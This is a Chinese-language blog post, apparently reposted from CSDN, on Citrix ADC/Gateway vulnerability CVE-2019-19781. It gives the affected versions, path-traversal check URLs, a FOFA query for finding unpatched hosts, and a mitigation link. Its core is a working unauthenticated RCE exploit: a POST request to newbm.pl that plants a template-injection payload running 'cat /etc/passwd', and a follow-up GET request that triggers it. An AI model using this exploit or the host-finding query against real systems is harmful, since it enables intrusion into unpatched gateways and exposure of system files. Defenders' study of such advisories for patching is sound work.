漏洞描述
Citrix旗下多款交付控制器和网关存在RCE漏洞,攻击者在无需身份验证的情况下就可执行任意命令。根据其他安全网站的说法,这个RCE漏洞会有一个标记漏洞(其中之一的标记),即本次报道的Citrx路径遍历漏洞(CVE-2019-19781)。Citrx路径遍历漏洞(CVE-2019-19781)利用方式的PoC已被公开。该漏洞利用复杂性低,且无权限要求,攻击者只能遍历vpns文件夹,但攻击者可能利用Citrx路径遍历漏洞进行RCE漏洞试探,从而发起进一步精准攻击。
影响范围
Citrix NetScaler ADC and NetScaler Gateway version 10.5,Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1 ,Citrix ADC and Citrix Gateway version 13.0
漏洞检测方法
根据此次公开的PoC显示,该洞目录遍历被限制子在vpns文件夹下,任意用户可通过HTTP请求直接访问该目录下的文件。
https://xx.xx.xx.xx/vpn/../vpns/services.html
https://xx.xx.xx.xx/vpn/../vpns/smb.conf
如果没有修复的话的会返回 http 200
通过fofa搜索
title="Citrix"
目前还是有很多没打补丁的
附上POC,建议修改文件名,文件名为:jas502n
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1
Host: 192.168.3.244
User-Agent: 1
Connection: close
NSC_USER: ../../../netscaler/portal/templates/jas502n
NSC_NONCE: nsroot
Content-Length: 97
url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]
请求上传的内容
GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1
Host: 192.168.3.244
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
NSC_USER: nsroot
NSC_NONCE: nsroot
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
以上代码来自jas502n大佬,GitHub地址:https://github.com/jas502n/CVE-2019-19781
修复建议
请参考官方缓解措施:https://support.citrix.com/article/CTX267679
来源:CSDN
作者:whatday
链接:https://blog.csdn.net/whatday/article/details/104582666